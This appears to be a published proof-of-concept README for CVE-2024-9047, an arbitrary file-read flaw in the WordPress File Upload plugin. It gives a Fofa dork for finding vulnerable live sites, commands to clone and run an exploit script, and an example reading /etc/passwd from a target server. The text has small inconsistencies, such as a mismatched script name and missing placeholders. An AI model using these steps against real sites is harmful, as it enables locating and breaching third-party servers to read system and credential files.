## https://sploitus.com/exploit?id=E508780B-3010-5BC3-AB3F-DFEF39A8F29D
# POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11 - (CVE-2024-9047)
[](https://buymeacoffee.com/verylazytech/extras)
[](https://medium.com/@verylazytech)
[](https://github.com/verylazytech)
[](https://buymeacoffee.com/verylazytech)
[](https://x.com/verylazytech)
## Overview
The WordPress File Upload plugin is vulnerable due to improper input validation in the wfu_file_downloader.php file, affecting versions **Disclaimer**: This Proof of Concept (POC) is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
## Getting Started
### Finding Targets
To identify potential targets, you can use Fofa (a search engine similar to Shodan.io) with the following query:
- **Fofa Dork**: `body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"`

### Cloning the Repository
First, clone the repository:
```bash
git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
```
Run the Exploit:
### For Linux / MacOs:
```bash
bash ./cve-2024-9047.sh
```
- Replace with the target's URL (e.g., www.example.com).
- Replace with the desired file path on the target server (e.g., /etc/passwd).
### Example Usage
```bash
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwd
```
- The script will check the plugin version and, if vulnerable, attempt to retrieve the specified file.
